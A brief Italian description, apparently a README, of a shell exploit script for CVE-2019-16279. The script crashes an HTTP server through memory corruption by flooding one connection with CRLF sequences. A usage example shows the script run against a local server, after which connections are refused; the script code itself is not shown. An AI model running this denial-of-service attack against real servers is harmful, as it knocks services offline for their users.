
Script shell di exploit per CVE-2019-16279 che attiva un denial-of-service tramite corruzione della memoria inviando sequenze CRLF eccessive a un server HTTP.
(CVE-2019-16279)dos Questo bug sfrutta un errore di memoria quando si inviano troppi \r\n in una singola connessione.
Esempio
$ curl http://127.0.0.1:8080 HELLO! $ ./CVE-2019-16279.sh 127.0.0.1 8080 $ curl http://127.0.0.1:8080 curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused